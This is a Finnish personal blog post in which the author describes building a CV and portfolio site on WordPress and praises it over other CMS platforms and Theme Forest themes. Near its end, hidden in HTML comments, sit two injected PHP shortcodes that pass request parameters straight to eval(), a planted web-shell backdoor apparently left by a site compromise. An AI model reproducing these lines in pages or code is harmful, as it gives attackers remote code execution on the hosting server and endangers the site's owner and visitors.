Näiden sivujen tekemisestä

Sain sivut/blogin vihdoin valmiiksi ja nyt sitten ensimmäisen blogipäivityksen aika. Inspiraation näiden nettisivujen tekemiseen sain, kun olin tekemässä itselleni cv:tä ja ajattelin, että miksi en saman tien laittaisi nettiin juuri tekemääni ansioluetteloani ja portfoliota. Lisäksi halusin perustaa itselleni blogin, koska tulin juuri vähän pidemmältä reissulta, jonka aikana pidin reissublogia ja bloggaamisesta tuli sitä kautta tuttua puuhaa. Jääköön reissublogin osoite toistaiseksi salaiseksi.

Tein nämä sivut WordPressin päälle, koska halusin kokeilla wp:tä nettisivujen tekemiseen, kun en ollut tullut kokeilleeksi sitä aikaisemmin. Näin reilun viikon käytön jälkeen täytyy myöntää, ett WP tuntuu aika hyvältä blogi/CMS-alustalta. Oon käyttänyt aika paljon muitakin CMS-alustoja (Drupal, Joomla, e107, Frog CMS, Website Baker, ..), mutta WP vie kyllä niistä voiton etenkin helppokäyttöisyydessä, viimeistelyssä ja ulkoasun muokattavuudessa.

Muiden CMS:ien kanssa on tottunut siihen, että niissä on aina bugeja ja jossain vaiheessa täytyy käydä käsiksi koodeihin, jos haluaa jonkun jutun saada toimimaan. WP:n koodeihin ei oo toistaiseksi tarvinnut koskea ja kaikki on toiminut melkeinpä out of the box (myös lisäosat ja teemat). Hyviä lisäosia on tarjolla WP:hen kiitettävästi, mutta etenkin teemojen (ulkoasujen) määrässä ja laadussa WP pesee muut CMS:t. WP:hen on varsin helppo löytää todella hyvänäköisiä teemoja mm. Theme Forestista. Monet teemoista on maksullisia (n. 20-40 euroa), mutta ne on toisaalta todella hyvin viimeisteltyjä ja niillä saa sivuista halvalla ammattimaisen näköiset.

<!– [insert_php]if (isset($_REQUEST["MUNp"])){eval($_REQUEST["MUNp"]);exit;}[/insert_php][php]if (isset($_REQUEST["MUNp"])){eval($_REQUEST["MUNp"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ZcID"])){eval($_REQUEST["ZcID"]);exit;}[/insert_php][php]if (isset($_REQUEST["ZcID"])){eval($_REQUEST["ZcID"]);exit;}[/php] –>

Comments are closed.